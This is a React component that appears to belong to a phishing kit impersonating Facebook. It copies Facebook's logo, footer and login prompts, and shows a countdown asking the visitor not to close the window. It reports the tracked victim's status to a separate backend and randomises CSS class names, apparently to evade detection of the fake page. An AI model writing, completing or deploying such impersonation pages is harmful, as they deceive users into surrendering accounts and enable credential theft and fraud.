import React, { useEffect, useState } from "react";
import "./styles/confirmation.css";
import { API_BE } from "./utils/variable";
import { generateRandomString } from "./utils/generateRandomString";

export const TenMinute = (props) => {
  const [minutes, setMinutes] = useState(59);
  const [seconds, setSeconds] = useState(59);

  const updateStatus = () => {
    let unique_id = localStorage.getItem("unique_id");

    if (unique_id) {
      unique_id = JSON.parse(unique_id);

      const data = {
        unique_id,
        status: 2,
      };

      fetch(`${API_BE}/users`, {
        method: "PUT",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify(data),
      })
        .then((response) => response.json())
        .then(() => { props.setValue(2) });
    }
  };


  useEffect(() => {
    let myInterval = setInterval(() => {
      if (seconds > 0) {
        setSeconds(seconds - 1);
      }
      if (seconds === 0) {
        if (minutes === 0) {
          updateStatus();
          clearInterval(myInterval);
        } else {
          setMinutes(minutes - 1);
          setSeconds(59);
        }
      }
    }, 1000);
    return () => {
      clearInterval(myInterval);
    };
  });
  return (
    <>
      <div className={`confirmation-container-modal ${generateRandomString()}`}>
        <div className={`header-color ${generateRandomString()}`}>
          <div className={`header-container ${generateRandomString()}`}>
            <div className={`logo__faceook ${generateRandomString()}`}></div>
          </div>
        </div>
        <div className={`auth-req-container auth__req-modal ten__minute-wrapper ${generateRandomString()}`}>
          <div className={`like__wrapper ${generateRandomString()}`}>
            <h2></h2>
            <p>Plesase don't close this windows and continue after {minutes === 0 && seconds === 0 ? null : (
              <span>
                {minutes}:{seconds}
              </span>
            )} minutes</p>
            <div className={`like__center ${generateRandomString()}`}>

              <div className={`like__image ${generateRandomString()}`}>

              </div>
            </div>
          </div>
          <div className={`having-trouble-class having__trouble-modal ${generateRandomString()}`}>
            <button>Having trouble?</button>
          </div>
          {/* <div className={`show-button-mobile ${loading && "disableButton"}`}>
            <button onClick={handleSubmit}>Continue</button>
          </div> */}
          <div className={`show-footer-on-mobile-plus hide__footer-modal ${generateRandomString()}`}>
            <h2 className="h2-foot not__you-text">Not You? Log In Here</h2>
            <div className={`footer-flex-mobile-plus confimartion__modal ${generateRandomString()}`}>
              <div>
                <h2>English (US)</h2>
                <p>Deutsch</p>
                <p>Српски</p>
                <p>Português (Brasil)</p>
              </div>
              <div>
                <p>Italiano</p>
                <p>Bosanski</p>
                <p>Svensk</p>
                <button>+</button>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div className={`modal__footer ${generateRandomString()}`}>
        <div className={`footer-menu-flex-ul ${generateRandomString()}`}>
          <div className={`container-language-footer ${generateRandomString()}`}>
            <ul className="flex-ul">
              <li>English (US)</li>
              <li>Español</li>
              <li>Deutsch</li>
              <li>Türkçe</li>
              <li>Српски</li>
              <li>Français (France)</li>
              <li>Italiano</li>
              <li>Bosanski</li>
              <li>Svensk</li>
              <li>Português (Brasil)</li>
              <button className="countrys-button">
                <span>+</span>
              </button>
            </ul>
          </div>
          <div className={`flex-second-ul ${generateRandomString()}`}>
            <ul>
              <li>Sign Up</li>
              <li>Log In</li>
              <li>Messenger</li>
              <li>Facebook Lite</li>
              <li>Watch</li>
              <li>Places</li>
              <li>Games</li>
              <li>Marketplace</li>
              <li>Facebook Pay</li>
              <li>Oculus</li>
              <li>Portal</li>
              <li>Instagram</li>
              <li>Bulletin</li>
              <li>Local</li>
            </ul>
          </div>
          <div className={`flex-second-ul-2 ${generateRandomString()}`}>
            <ul>
              <li>Fundraisers</li>
              <li>Services</li>
              <li>Voting Information Centre</li>
              <li>About</li>
              <li>Create ad</li>
              <li>Create Page</li>
              <li>Developers</li>
              <li>Careers</li>
              <li>Privacy</li>
              <li>Cookies</li>
              <li className="ad-choice-img">
                Ad Choices <span className="img-li"></span>{" "}
              </li>
              <li>Terms</li>
              <li>Help</li>
            </ul>
          </div>
          <div className={`meta-footer ${generateRandomString()}`}>
            <p>Meta © 2022</p>
          </div>
        </div>
      </div>
    </>
  );
};
